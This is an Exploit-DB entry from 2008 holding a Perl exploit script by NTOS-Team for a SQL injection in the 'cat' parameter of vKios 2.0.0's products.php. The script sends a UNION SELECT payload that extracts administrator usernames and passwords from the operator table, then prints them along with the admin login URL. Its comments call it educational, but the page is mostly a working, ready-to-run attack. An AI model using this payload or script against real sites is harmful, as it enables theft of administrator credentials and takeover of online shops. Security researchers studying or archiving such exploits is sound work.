vKios 2.0.0 - 'cat' SQL Injection

EDB-ID:

5101

CVE:

N/A

EDB Verified:

Author:

NTOS-Team

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2008-02-12

Vulnerable App: 
#!/usr/bin/perl
#
# Indonesian Newhack Security Advisory
# ------------------------------------
# vKios <= 2.0.0  (products.php cat) Remote SQL Injection Exploit
# Waktu		:  Feb 8 2008 10:00PM
# Software	:  vKios  
# Versi		:  <= 2.0.0
# Vendor 	:  http://www.vkios.com/
#
# ------------------------------------
# Audit Oleh 	:  NTOS-Team
# Lokasi	:  Indonesia | http://newhack.org
# Penjelasan	:
# 
# vKios adalah aplikasi CMS untuk membangun website toko online dalam sekejap
# variabel "cat" pada berkas "products.php" tidak tersaring dengan sempurna
# sehingga pengunjung site dapat memanipulasi pernyataan SQL melalui URL secara Remote
# Contoh ;
# http://site.korban/products.php?cat=[SQLI]   
#
# -------------------------------------
# Exploit ini dibuat untuk pembelajaran, pengetesan dan pembuktian dari apa yang kami pelajari,
# Indonesian Newhack Technology tidak bertanggung jawab akan kerusakan 
# yang diakibatkan dari penyalahgunaan exploit oleh pihak lain  
#
# => NTOS-Team->[fl3xu5,k1tk4t,opt1lc]
# 
use LWP::UserAgent;
use Getopt::Long;

if(!$ARGV[2])
{
 print "\n  |-------------------------------------------------------|";
 print "\n  |            Indonesian Newhack Technology              |";
 print "\n  |-------------------------------------------------------|";
 print "\n  | vKios (products.php cat) Remote SQL Injection Exploit |";
 print "\n  |                Coded by NTOS-Team                     |";
 print "\n  |-------------------------------------------------------|";
 print "\n[!] ";
 print "\n[!] Penggunaan : perl vkios.pl [Site] [Path] [Option]";
 print "\n[!] [Option] 2 = versi > 1.3  |  1 = versi < 1.3 ";
 print "\n[!] Contoh     : perl vkios.pl localhost /vkios/ -o 1";
 print "\n[!] ";
 print "\n";
 exit;
}
$site = $ARGV[0]; # Site Target
$path = $ARGV[1]; # Path direktori vKios
%options = ();
GetOptions(\%options, "o=i",);
if($options{"o"} && $options{"o"} == 1) { $injek = "http://".$site.$path."products.php?cat=-1%20union%20select%201,concat(0x74346d7520,username,0x3a,password,0x2067656c3470),3,4,5,6,7,8,9%20from%20operator"; }
if($options{"o"} && $options{"o"} == 2) { $injek = "http://".$site.$path."products.php?cat=-1%20union%20select%201,concat(0x74346d7520,username,0x3a,password,0x2067656c3470),3,4,5,6,7,8,9,10%20from%20operator"; }

$www = new LWP::UserAgent;
$sql = $injek;
print "\n\n [Konek] Injeksi SQL \n";
$res = $www -> get($sql) or err();
$res -> content() =~ /t4mu (.*?) gel4p/ or err();
print "\n [Info.] username:password";
print "\n [Hasil] $1 \n";
print "\n [Login] http://".$site.$path."admin/ \n\n";

sub err()
{
print "\n [-] Exploit gagal :( - cari yang lain!";
exit();
}

# milw0rm.com [2008-02-12]
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services